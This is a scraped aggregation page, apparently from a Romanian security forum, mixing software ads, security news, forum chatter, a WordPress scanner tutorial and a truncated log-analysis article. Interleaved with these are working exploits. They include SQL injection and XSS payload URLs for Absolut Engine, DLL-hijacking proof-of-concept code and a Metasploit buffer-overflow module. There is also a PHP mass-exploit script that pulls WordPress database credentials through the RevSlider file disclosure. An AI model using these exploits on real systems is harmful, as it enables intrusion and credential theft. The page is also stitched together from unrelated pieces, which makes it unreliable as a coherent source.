Aerosol

CrashPlan aims to make backing up your files and data as easy as possible; it sits in the background on your computer, silently and continually backing up your files while using minimal CPU and RAM. You can store your encrypted backups locally on your own computer, external drives (including USB flash), or other computers. With the Family Unlimited plan, you also have the ability to store backups in CrashPlan’s online unlimited cloud storage. Yes, that is unlimited as in you can store as many files as you like in cloud storage — there is no space limitation. CrashPlan is available on all major platforms — desktop and mobile. Try it now! Sale ends in 10 days 20 hrs 19 mins Download

Windows Blu-ray Player allows you to play Blu-ray discs, folders, and ISOs on you computer. It can also play DVDs, videos, and audios, and view photos and images — all all-in-one media playback program for your needs. Sale ends in 20 hrs 19 mins Download

Advisory: Multiple SQL Injections and Reflecting XSS in Absolut Engine v.1.73 CMS Advisory ID: SROEADV-2014-08 Author: Steffen Rösemann Affected Software: CMS Absolut Engine v. 1.73 Vendor URL: http://www.absolutengine.com/ Vendor Status: solved CVE-ID: - ========================== Vulnerability Description: ========================== The (not actively developed) CMS Absolut Engine v. 1.73 has multiple SQL injection vulnerabilities and a XSS vulnerability in its administrative backend. ================== Technical Details: ================== The following PHP-Scripts are prone to SQL injections: *managersection.php (via sectionID parameter) *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1* *Exploit Example:* *http://{TARGET}/admin/managersection.php?&username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&sectionID=1%27+and+1=2+union+select+1,version%28%29,3,4,5,6+--+* *edituser.php (via userID parameter) *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3* *Exploit Example:* *http://{TARGET}/admin/edituser.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7&userID=3%27+and+1=2+union+select+1,user%28%29,3,version%28%29,5,database%28%29,7,8,9+--+* *admin.php (via username parameter, BlindSQLInjection) *http://{TARGET}/admin/admin.php?username=admin&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *Exploit Example:* *http://{TARGET}/admin/admin.php?username=admin%27+and+substring%28user%28%29,1,4%29=%27root%27+--+&session=c8d7ebc95b9b1a72d3b54eb59bea56c7* *managerrelated.php (via title parameter) *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title <http://localhost/absolut/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title>={some_title}* *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title={some_title}%27+and+1=2+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12+--+* The last PHP-Script is as well vulnerable to a Reflecting XSS vulnerability. *Exploit Example:* *http://{TARGET}/admin/managerrelated.php?username=user&session=ae29000d8570273c8917e874d029b336&articleID=0&title=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E* Although this is a product which is not actively developed anymore, I think it is worth mentioning as the idea (of the lists) are to keep tracking (unknown) vulnerabilities in software products (but that is a personally point of view). Moreover, this product is still in use by some sites (!) and it is offered without a hint of its status. ========= Solution: ========= As the CMS is not actively developed, it shouldn't be used anymore. ==================== Disclosure Timeline: ==================== 29-Dec-2014 – found the vulnerability 29-Dec-2014 - informed the developers 29-Dec-2014 – release date of this security advisory [without technical details] 30-Dec-2014 – Vendor responded, won't patch vulnerabilities 30-Dec-2014 – release date of this security advisory 30-Dec-2014 – post on FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== http://www.absolutengine.com/ http://sroesemann.blogspot.de Source

China is known as the nation of 'global internet censorship', and the country proved it many times, in fact when recently it blocked the access to Gmail from the country. Now, it seems that its northern neighbouring country, India doesn't want to get left behind. On Wednesday, the Indian Computer Emergency Response Team issued the ban, asking internet service providers and mobile operators to block access to dozens of popular websites in the name of its censorship laws, according to a government advisory made public by Pranesh Prakash, director of the Centre for Internet and Society in Bangalore. As many as 32 websites including GitHub, PasteBin, Vimeo, Imgur, DailyMotion, Internet Archive have reportedly been banned in India under an order from the Department of Telecom (DoT). Vodafone, the second largest mobile network operator in India (after Airtel) with an estimated 173 million customers and BSNL, Indian state-owned telecom operator with 117 million customers, have already blocked access to the above mentioned websites. However, other telecom operators and ISPs are still providing access to those websites. The Indian government has accused the websites for hosting anti-India material content posted by the members of a terrorist organization called Islamic State group, also known as ISIS. Now this is really insane. On one side, where the Indian government talk about Internet freedom in the country and on the other side, the government is blocking access to sites like Github, which has over 8 million registered users worldwide. I have no idea that how could github website spread inflammatory content among Indians, which actually used to store source code from over 8 Million users. OK, let us agree that it actually hosting something unusual against the nation’s interest. But, even if a single page was found guilty, the blockage of the entire website seems a totally nonsensical decision. The notice sent to all Internet Service Licensees mentions the Section 69A of the IT Act, 2000, which states "Power to issue directions for blocking for public access of any information through any computer resource." Based on which the DoT have decided to immediately block the access to 32 websites. Prakash posted a copy of the notice listing the 32 blocked URLs. The URLs listed include: justpaste.it hastebin.com codepad.org freehosting.com vimeo.com dailymotion.com pastebin.com gist.github.com archive.org ipaste.eu github.com (gist-it) pastie.org pastee.org paste2.org thesnippetapp.com snipt.net tny.cz (Tinypaste) slexy.org paste4btc.com 0bin.net heypasteit.com sourceforge.net/projects/phorkie atnsoft.com/textpaster hpage.com ipage.com webs.com weebly.com 000webhost.com snipplr.com termbin.com snippetsource.net cryptbin.com However, the contents of the list is particularly embarrassing for Prime Minister Narendra Modi as well, who recently unveiled a "Make In India" campaign earlier this year in an attempt to encourage international businesses to invest in India, which also includes information technology sector. And blocking websites like GitHub is the most definitely not in sync with that vision. Source

Since the disclosure of a serious file-upload vulnerability in WordPress Symposium and the public availability of proof-of-concept exploit code, attacks against sites running the plug-in are starting to raise concern. Researchers at Trustwave SpiderLabs on Tuesday said they had snared a number of exploit attempts in their honeypot, and researchers at Sucuri have been monitoring scans for the plug-in since the start of the month, almost two weeks before the Dec. 11 public disclosure by Italian researcher Claudio Viviani. The vulnerability allows an attacker to upload files without authentication to sites running Symposium, SpiderLabs lead researcher Ryan Barnett wrote in an advisory. In one such exploit attempt, Barnett said an attacker uploaded a PHP file that included various PHP backdoor code through which a hacker could send commands over HTTP. The file also included the WSO webshell, which provides a remote view into a server’s management interface. According to statistics from WordPress, the plug-in has been downloaded slightly more than 150,000 times, which pales in comparison to some of the more popular plug-ins such as Aksimet (27 million downloads) and Contact Form 7 (22 million). Despite the relatively low number of downloads, the public availability of PHP exploit code and the ease in which hackers are able to locate sites running the vulnerable plug-in merits site operators evaluate the risk. “The end goal of most of these attackers is to install webshell/backdoors so that they can have access/control on the website,” Barnett told Threatpost. “They monitor for new 0-day vulnerabilities to exploit, to then install the webshells. WP-Symposium is simply the ‘vuln of the day.'” WSO webshell has been used by hackers before in order to gain remote control over a website; the webshell enables attackers to remotely read files and databases, execute OS level commands, install drive-by-download malware links and even attack other websites, Barnett said. Compounding the problem is the fact that despite updated versions of the plug-in being available, Barnett said the problem persists. “I downloaded the latest version of the code from both the WordPress website and directly from the wpsymposium site and verified that it is still vulnerable,” Barnett said. Barnett said that vulnerable files are also present on the mobile version. Those files are: /wp-symposium/server/php/index.php; /wp-symposium/server/php/UploadHandler.php; /wp-symposium/mobile-files/server/php/index.php; and /wp-symposium/mobile-files/server/php/UploadHandler.php. Researchers at Sucuri said they were able to verify similar attacks against sites running Symposium. Sucuri reports an increase in Internet scans for the plug-in starting early this month, especially after Dec. 11 when the vulnerability was publicly disclosed. The number of scans per day peaked on Monday at close to 3,800. Sucuri said the first two exploits were attempted on Dec. 1 and Dec. 9, two days before disclosure. “Someone out there knew of this vulnerability and was actively attempting to exploit it,” Sucuri’s David Dede wrote in an advisory. “Whether it was made public via underground forums, they are the ones that found it or some other means. Either way, we were dealing with an active 0-day vulnerability.” Source

Salut, vreau sa il reclam si eu pe @wHoIS de ce faci offtopic? Nu am cerut niciodata atentie nici din partea ta si nici din partea altora daca nu faci parte din staff te rog sa nu mai postezi aiurea!

“The year 2014 will be remembered as ‘The Year of Shaken Trust,’” says Vincent Weafer, senior vice-president, at McAfee Labs, which is part of Intel Security. “This unprecedented series of events shook industry confidence in long-standing Internet trust models, consumer confidence in organizations’ abilities to protect their data, and organizations’ confidence in their ability to detect and deflect targeted attacks in a timely manner.” Here are some of the more notable cyber-security issues that grabbed the spotlight in 2014. 1. ebay gets hacked In February, eBay reveals that hackers managed to steal the personal records of 233 million users of the popular online auction service. Records included, usernames, passwords, phone numbers and home addresses. 2. Heartbleed and the Canada Revenue Agency In April, researchers disclose the HeartBleed vulnerability, which is a massive mistake in the software code that drives secure communication, Secure Socket Layer encryption, online. In July, Canada Revenue Agency reports its systems have been breached due to the HeartBleed vulnerability and tax information from an undisclosed number of Canadians has been stolen. Stephen Arthuro Solis-Reyes, a young man from London, Ont., has been charged in connection to the CRA attack. 3. NRC hit by sophisticated hackers Also in July, highly sophisticated state-sponsored hackers from China are alleged to have targeted and attacked the National Research Council, making off with classified information from government computers. 4. Jennifer Lawrence and other celebrities targeted In August, hackers gained access to Apple Inc.’s iCloud service, stealing thousands of personal photos of celebrities in various stages of undress, including photos of Hunger Games star Jennifer Lawrence, who referred to it in one media report as a “sex crime.” 5. About 70 million Home Depot customers victimized In September, Home Depot announced its systems were compromised by hackers and personal banking information from more than 70 million customers throughout the U.S. and Canada was exposed. 6. You thought HeartBleed was bad? Meet Bash Bug Also in September, researchers discover the Bash Bug (also called ShellShock), which is worse than HeartBleed. The bug allows an attacker to make a specific request through aprompt online that opens access to the operating system, giving the hacker access to any Unix-based system and leaving a gateway so the hacker can return at a later date. 7. Personal data stolen from J.P. Morgan customers — 76 million of them In October, J.P. Morgan Chase & Co. revealed that hackers had stolen the personal information of more than 76 million customers and seven million small businesses. 8. Wirelurker preys on Apple iOS devices In November, researchers at Palo Alto Networks found malware that attacks Apple Inc.’s iOS devices called Wirelurker. The program, which spreads to the device through an infected PC, is designed to collect call logs, contact information and other sensitive data from the devices. 9. Remember the dancing banana? It was also in November that a hacker named Aerith tricked a network technician into redirecting visitors to the City of Ottawa’s home page to another address depicting a dancing banana. He then attacked the Ottawa police website as well as other websites with unsophisticated, yet problematic, denial of service attacks. 10. The Interview In December, Sony Pictures was the victim of a massive hack on its systems by a group claiming to oppose the release of the motion picture The Interview, a film that depicts two journalists in their attempt to assassinate North Korean leader Kim Jong-un. Hackers made off with personal information and emails, corporate secrets (including upcoming screen plays) and reams of other communications and sensitive data. Source

/* * Exploit Title:iFunbox 2014 3.4.697.652 DLL Hijacking Exploit (itunesmobiledevice.dll) * Date: 25/12/2014 * Author: Hadji Samir s-dz@hotmail.fr * Vendor Homepage: http://i-funbox.com/ *Soft link :http://dl.i-funbox.com/ifunbox2014_setup.exe * Tested on: windows 7 fr */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "iFunbox DLL Hijacked\Hadji Samir", "POC", MB_OK); } Source

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rexml/document' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh include REXML def initialize(info = {}) super(update_info(info, 'Name' => 'i-FTP Schedule Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow vulnerability in i-Ftp v2.20, caused by a long time value set for scheduled download. By persuading the victim to place a specially-crafted Schedule.xml file in the i-FTP folder, a remote attacker could execute arbitrary code on the system or cause the application to crash. This module has been tested successfully on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'metacom', # Vulnerability discovery and PoC 'Gabor Seljan' # Metasploit module ], 'References' => [ [ 'EDB', '35177' ], [ 'OSVDB', '114279' ], ], 'DefaultOptions' => { 'ExitFunction' => 'process' }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x0a\x0d\x20\x22", 'Space' => 2000 }, 'Targets' => [ [ 'Windows XP SP3', { 'Offset' => 600, 'Ret' => 0x1001eade # POP ECX # POP ECX # RET [Lgi.dll] } ] ], 'Privileged' => false, 'DisclosureDate' => 'Nov 06 2014', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'Schedule.xml']) ], self.class) end def exploit evil = rand_text_alpha(target['Offset']) evil << generate_seh_payload(target.ret) evil << rand_text_alpha(20000) xml = Document.new xml << XMLDecl.new('1.0', 'UTF-8') xml.add_element('Schedule', {}) xml.elements[1].add_element( 'Event', { 'Url' => '', 'Time' => 'EVIL', 'Folder' => '' }) sploit = '' xml.write(sploit, 2) sploit = sploit.gsub(/EVIL/, evil) # Create the file print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(sploit) end end Source

/* * Exploit Title: iExplorer 3.6.3.0 DLL Hijacking Exploit (itunesmobiledevice.dll) * Date: 25/12/2014 * Author: Hadji Samir s-dz@hotmail.fr * Vendor Homepage: http://www.macroplant.com/ *Soft link :http://www.macroplant.com/downloads * Tested on: windows 7 fr */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "iExplorer DLL Hijacked\Hadji Samir", "POC", MB_OK); } Source

/* * Exploit Title: MobiConnect 23.009.17.00.216 HUAWEI Insecure Permissions Local Privilege Escalation & DLL Hijacking Exploit (wintab32.dll) * Date: 25/12/2014 * Author: Hadji Samir s-dz@hotmail.fr * Vendor Homepage: http://www.mobilis.dz/entreprises/mobiconnect.php * Vendor: http://www.huawei.com/ * Tested on: windows 7 FR ##################### Insecure Permissions Local Privilege Escalation #################### C:\Program Files>cacls "MobiConnect" C:\Program Files\MobiConnect BUILTIN\Utilisateurs:(OI)(IO)F BUILTIN\Utilisateurs:(CI)F NT SERVICE\TrustedInstaller:(ID)F NT SERVICE\TrustedInstaller:(CI)(IO)(ID)F AUTORITE NT\Système:(ID)F AUTORITE NT\Système:(OI)(CI)(IO)(ID)F BUILTIN\Administrateurs:(ID)F BUILTIN\Administrateurs:(OI)(CI)(IO)(ID)F CREATEUR PROPRIETAIRE:(OI)(CI)(IO)(ID)F C:\Program Files\MobiConnect>cacls "MobiConnect.exe" C:\Program Files\MobiConnect\MobiConnect.exe BUILTIN\Utilisateurs:F AUTORITE NT\Système:(ID)F BUILTIN\Administrateurs:(ID)F ########################DLL Hijacking Exploit (wintab32.dll)######################### */ #include <windows.h> BOOL WINAPI DllMain ( HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: owned(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int owned() { MessageBox(0, "MobiConnect DLL Hijacked\Hadji Samir", "POC", MB_OK); } Source

# Exploit Title: [Wordpress RevSlider Plugin LFD] # Google Dork: inurl:/admin-ajax.php?action=revslider_show_image # Date: 12/29/14 # Exploit Author: FarbodEZRaeL # Vendor Homepage: iranhack.org # Software Link: wordpress.org # Tested on: windows #Exploit: <html> <head> <title>Exploits Wordpress</title> </head> <body style="background-color: rebeccapurple;"> <pre><p><center style="color: aqua;"> ============================================================= = Exploits Wordpress RevSlider Plugin LFD Vuln = = = = Coded by FarbodEZRaeL = = Iranhack Security team = = www.iranhack.org = = Fix bug Other Version = ============================================================= <pre><href> <form method='POST'> <textarea name='sites' cols='45' rows='0'></textarea> <br> <input type='submit' value='Exploit' /> </form> <?php # Coded by FarbodEZRaeL # Exploits Wordpress RevSlider Plugin LFD Vuln @file_get_contents("$site/?author=1"); preg_match('/<title>;(.*?)<\/title>/si',$users,$user); $wpuser = explode('|',$user[1]); echo " <br>======================================</br>"; echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php"); curl_setopt($ch, CURLOPT_HTTPGET, 1); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); $xp = curl_exec ($ch); curl_close($ch); if(preg_match("#DB_USER#i",$xp)){ preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME); echo "DB_NAME:{$DB_NAME[1]}<br>"; preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER); echo "DB_USER:{$DB_USER[1]}<br>"; preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD); echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>"; preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST); echo "DB_HOST:{$DB_HOST[1]}<br>"; } $lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php"); foreach($lt as $l){ $site = "$site/$l"; $process = curl_init($site); curl_setopt($process, CURLOPT_TIMEOUT, 30); curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"); curl_setopt($process, CURLOPT_HEADER, TRUE); curl_setopt($process, CURLOPT_POST, 1); curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php"); curl_setopt($process, CURLOPT_RETURNTRANSFER, 1); curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1); $return = curl_exec($process); if(preg_match("#DB_USER#i",$return)){ preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME); echo "DB_NAME:{$DB_NAME[1]}<br>"; preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER); echo "DB_USER:{$DB_USER[1]}<br>"; preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD); echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>"; preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST); echo "DB_HOST:{$DB_HOST[1]}<br>"; break; echo " <br>-----------------------------------</br>"; ob_implicit_flush(true); ob_end_flush(); } } } ?> </pre></p></center> Source

------------------------------------------------------------------------------ Symantec Web Gateway <= 5.2.1 (restore.php) OS Command Injection Vulnerability ------------------------------------------------------------------------------ [-] Software Link: http://www.symantec.com/web-gateway/ [-] Affected Versions: Version 5.2.1 and prior versions. [-] Vulnerability Description: The vulnerable code is located in the /spywall/restore.php script: 79. $temp_file_name = trim($restore_file["tmp_name"]); 80. $upload_orig_name = basename($restore_file['name']); 81. //do this in case user change .des3 extnsion to .bak which is idential to backup file ... 82. $temp_orig_name = str_replace(".bak", ".des3",$upload_orig_name); 83. 84. $filePath = "/tmp/$temp_orig_name"; 85. 86. syscall ("sudo rm -f $filePath"); //make sure this file not exists. User input passed via the filename of uploaded files is not properly sanitised before being used in a call to the "syscall()" function at line 86. This can be exploited to inject and execute arbitrary OS commands with the privileges of the "root" user on the appliance. NOTE: version 5.1.1 suffers from an access restriction issue as well, meaning that the vulnerability can be exploited by any kind of user (even the ones with the lowest access privileges). In version 5.2.1 the vulnerability has been fixed and proper authorization checks are in place, however the vulnerability has been reintroduced in a different line of code and can be exploited only by administrator users. [-] Solution: Update to version 5.2.2. [-] Disclosure Timeline: [08/10/2014] - Vendor notified with vulnerability details [05/11/2014] - Vendor reply this will be fixed in the next release [16/12/2014] - Version 5.2.2 released [16/12/2014] - Vendor publishes security bulletin [31/12/2014] - Publication of this advisory [-] CVE Reference: The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-7285 to this vulnerability. [-] Credits: Vulnerability discovered by Egidio Romano, Secunia Research. [-] Original Advisory: http://karmainsecurity.com/KIS-2014-19 Source

La multi ani tuturor.

@AndreiMihai nu am mintit ai pus bot-ul sa injure pe em. ai zis la botz !injura em iti pun screen nu poti sa negi asta. Si em a vazut cand ai pus bot-ul sa injure.

Sa traiasca si eusimplu, Ca-i mai negru decat chibritu. La multi ani RST!

A federal judge in New Jersey has approved of law enforcement's use of a fake Instagram account to collect evidence on man suspected of stealing millions of dollars worth of jewelry. Daniel Gatson was charged with conspiracy to transport and receive stolen property and interstate transport of stolen property, according to the court's opinion. Gatson and conspirators allegedly ransacked multiple households in wealthy areas around the country, some of which were located in New Jersey. In one instance, Gatson and two others broke into a home in Holmdel, N.J., and stole about $7,000 in jewelry. Law enforcement tracked each member's cell phone location and determined that they were nearby multiple burglaries, including the Holmdel case, and during that robbery, an authorized wiretap was using to intercept a call between two of the men. The recently published court opinion refutes Gatson's claims that information was obtained unlawfully by law enforcement. Gatson specifically challenges the use of his Instagram account to get information about the case. He argued that there was no “probable cause to search and seize items in his Instagram account,” the opinion says. United States District Judge William Martini wrote that when Gatson accepted a friend request from an undercover Instagram account that was consensual, meaning no search warrant is required for the type of information obtained. “Gatson's motion to suppress the evidence obtained through the undercover account will be denied,” Martini wrote. The case is being compared to a similar one regarding a Facebook account created by a federal agent. In that case, a U.S. Drug Enforcement Administration Special Agent used photos off a woman's seized cell phone to create an account and communicate with suspected criminals, according to BuzzFeed News. The incident was under review in October and denounced by Facebook. Source

WordPress is the popular content management system and blogging platform being used by millions of websites. This is the reason hackers are targeting WordPress. Although the WordPress community is very active and they keep working to make it secure in the best possible ways, most of the time third party themes and plugins make WordPress vulnerable. Sometimes zero day vulnerabilities hit WordPress, and as a result, we see mass hacking attacks on WordPress. This is the reason WordPress users should always try to keep their WordPress website safe from hackers. According to the reports published a few months back, more than 70% of WordPress websites are vulnerable to various attacks. The number of hacked WordPress websites is growing every year. Generally, people think “why would someone hack my website?” and “I have nothing to lose.” But this is not true. If you have a less important website, hackers are not interested in your data. But they are interested in your server, and they can use it to send spam emails. If you have important data, then they will hack into your website and steal it. Most of the big companies hire security analysts who keep on finding vulnerabilities and patch them before hackers get in. But what about users who have a lower budget? If you have technical knowledge, you can make your WordPress secure by using known security plugins. And there are few tools which help us find vulnerabilities in a WordPress installation. By knowing the vulnerabilities, you can take action on patching those vulnerabilities. In this article, I am going to write about a less popular but effective tool called WPScanner. WPScanner is the WordPress security scanning tool developed by a well known company, WebSecurify. I already wrote an article on the WebSecurify vulnerability scanner. You can read that previous article to know how it works. Note: Before reading more about this tool, you should know that this tool only identifies and summarizes the vulnerabilities found in WordPress. Listed vulnerabilities will be sorted from the higher to low security. Reports can also be exported in various formats. Why did WebSecurify develop this tool if it already has the scanner? Actually the reason was pretty simple. The company said that they made a separate tool for WordPress because there was the need for a WordPress optimized tool. There are millions of websites running on it, and users are less techy. So, a WordPress optimized tool was needed. This tool only needs a URL and no complicated configuration. Now come back to WPScanner. This is not a standalone tool but a browser extension. But this browser extension works with WebSecurity Browser Extension (install it if it asks). It automatically identifies your browser and then asks to install WebSecurify if needed. When you open this tool in a browser, you will see a simple interface which is quite similar to the WebSecurify tool’s interface. There is a big text box at the top to enter the target URL. And at the left side, a few options. Figure 1: WPScanner interface If we take a look at the options on the left side, you will see five big icons for five different options. The first option having the WordPress icon is the homepage for this tool. Clicking on this will open the tool in a new tab. So there is nothing in this. The second option, which has a gear icon, is for the settings of the tool. This is the important section which you must take a look at before going to use this tool. Figure 2: WPScanner settings page The first settings option is to exclude URLs from the tool’s scope. If you want to to ignore a few URLs, you should write them here in separate lines. URLs like log out and search can be included in this, as they have no impact or may be the reason for false results. The second option is to include URLs which must be in the scope of the tool. So, you should add those URLs which are most sensitive here. The third option is to set the maximum depth of URLs to which the spider of the tool should go. Keep this low, because adding this to a high value will have an impact on your server, and it may take your server down. The last option is to test the scope. So, add those URLs where you want to test this tool first. The third icon is for exporting the reports. You can export a vulnerability report in HTML, XML, JSON and CSV formats. Use this item when you are done with scanning your website. Then forward this report to a security guy, or if you can, check by yourself. Figure 3: WPScanner Export options The fourth icon is help, which has nothing to help at all. Figure 4: WPScanner help page The last option is the global menu, which links to all the WebSecurify web apps. You can check other security apps by WebSecurify. I will try to write about those apps in the next few articles. Figure 5: WPScanner’s other apps The overview of the article has come to an end. Now, we will enter the target and try to scan it to find the potential vulnerabilities in it. When you try to start scanning, it will ask you to understand and confirm that this can damage your application. It is because the crawler will hit your website to scan. If your server has low configurations, it may add enough of a load to take it down. This is because automated security testing tools send arbitrary data to find security vulnerabilities in application. This is why we recommend creating a demo copy of your product if it is running. Running it on a live environment may harm your application. It may also lead to a Denial of Service attack. And in the worst case, if your application handles complicated tasks related to money, you may get a big financial loss. So, be careful. Once the scan has been started, it will start showing you information related to the WordPress theme and plugins. You can see the progress bar to check how much of the operation has been performed. Before every finding, it also shows the severity marked as Low, Medium or High. It also lists the text to read about impact, solution, details and references to know more about that specific vulnerability. Few vulnerabilities listed will be marked as Informational. You do not have to think about those. Now sit down and relax. The scan will take enough time based on the size of your website. It will crawl all the pages of your website and scan against its vulnerability database. It uses the existing vulnerabilities to match against the pages of your website and find the vulnerabilities. So, the newly found zero day vulnerabilities are not included. You can pause or stop the scan any time you want. And once you are done, you can export the report in available formats. How to patch vulnerabilities found by WPScanner Now, when we have the list of known vulnerabilities of the website, the big question is how to start. So let me explain the thing in short. First of all, you will have to filter the informational details from the report, because you do not need to take action on those informational vulnerabilities. Those are only for information purposes. Now, start with high severity vulnerabilities. This tool already offers the possible solution and reference links. You can use the listed solution and read the references to read more about the vulnerability and its effects. If you already know much about security, I am sure you will be able to understand how this vulnerability will affect you. Otherwise, you will have to take the help of any of your friends who can understand this. You should always try to get rid of these high and medium severity vulnerabilities as soon as possible. If the vulnerabilities are in the plugin, then deactivate that plugin and do not activate it until the update is available to patch the vulnerability. Similarly, you should also change the theme if there is any vulnerability in the theme. Additional steps to make your WordPress website safe from hackers If you are WordPress user, you should try the above tool to find the vulnerabilities in your WordPress blog. But this is not the end. You should also follow some more steps to tighten the security of your blog. Keep your WordPress version, themes and plugins up-to-date. WordPress regularly pushes updates which also contains the security fixes. Themes and plugins also push similar updates to patch the known bugs and security fixes. Don’t use the default username “admin”. Hackers generally try bruteforcing, and this name can be guessed. By using this common username, you are making the hacking process easier for hackers. Protect the WordPress Admin area wp-admin or wp-login.php file. You can use htaccess to only allow this file from a specific IP address. You can do this by adding this code in htaccess. <Files wp-login.php> order deny,allow Deny from all # allow access from my IP address allow from xxx.xxx.xxx.xxx </Files> Add your own IP address in xxx.xxx.xxx.xxx. If you think that this is not possible, you can then limit login attempts of your WordPress blog. You will find many tutorials on this. Use a strong password for your WordPress account. I know you already know this, and all the time people repeat this. But you should believe me that this is the must-follow step. The stronger the password you use, the more difficult it is for hackers to hack into your website. Use only trusted sources to download themes and plugins. I recommend never to go with nulled themes and plugins, because they may contain malicious codes. These kinds of plugins or themes with malicious codes can open a backdoor on your website. So, please stay away and download or purchase themes only from reputable sources. Sometimes, your server may expose your website to hackers. So make sure that you are using a secure web server. If you are using managed hosting, then it is possible that the web hosting company is working to make it secure. But if you are using an unmanaged server, then you have to do it yourself. Use correct file permissions on your server. Setting a directory with 777 permissions may allow a malicious script to upload a file or modify existing file on the server. So, take care of the permissions. All directories should have 755 or 750 permissions. For files, make sure they have 644 or 640. Wp-config.php is the most sensitive file and it must have 600 file permissions. At last, I want to add that you should backup your website often. This is a must-follow step. That way, you will have the backup always ready to recover your website in case something bad happens. Conclusion WPScanner is a nice scanning tool for WordPress which can help you in identifying the vulnerabilities on your website. Like other automated scanners, it can also list all the potential vulnerabilities of your website. Now it is up to you to manually verify the listed vulnerabilities and then fix if they really exist. Because most of the time, automated scanners list false vulnerabilities due to a few reasons. I tried this tool on a few websites and found it useful. But don’t rely on this tool alone. And follow the security steps I added at the end of the post. These steps will help you in keeping the hacker away from your website. Always update your blog’s WordPress, theme and plugins. And at least you can do this whenever the update is available. A few other security plugins also claim to help. I will be reviewing those plugins in upcoming posts. Please comment below if you have any doubt or any question regarding WordPress security or WP Scanner. I will try to respond as soon as I can. References Hardening WordPress « WordPress Codex https://suite.websecurify.com/apps/wpscanner/ More Than 70% of WordPress Installations are Vulnerable Source

Introduction It is often the case that web applications face suspicious activities due to various reasons, such as a kid scanning a website using an automated vulnerability scanner or a person trying to fuzz a parameter for SQL Injection, etc. In many such cases, logs on the webserver have to be analyzed to figure out what is going on. If it is a serious case, it may require a forensic investigation. Apart from this, there are other scenarios as well. For an administrator, it is really important to understand how to analyze the logs from a security standpoint. People who are just beginning with hacking/penetration testing must understand why they should not test/scan websites without prior permissions. This article covers the basic concepts of log analysis to provide solutions to the above mentioned scenarios. Setup For demo purposes, I have the following setup. Apache server – Pre installed in Kali Linux This can be started using the following command: service apache2 start MySQL – Pre installed in Kali Linux This can be started using the following command: service mysql start A vulnerable web application built using PHP-MySQL I have developed a vulnerable web application using PHP and hosted it in the above mentioned Apache-MySQL. With the above setup, I have scanned the URL of this vulnerable application using few automated tools (ZAP, w3af) available in Kali Linux. Now let us see various cases in analyzing the logs. Logging in the Apache server It is always recommended to maintain logs on a webserver for various obvious reasons. The default location of Apache server logs on Debian systems is /var/log/apache2/access.log Logging is just a process of storing the logs in the 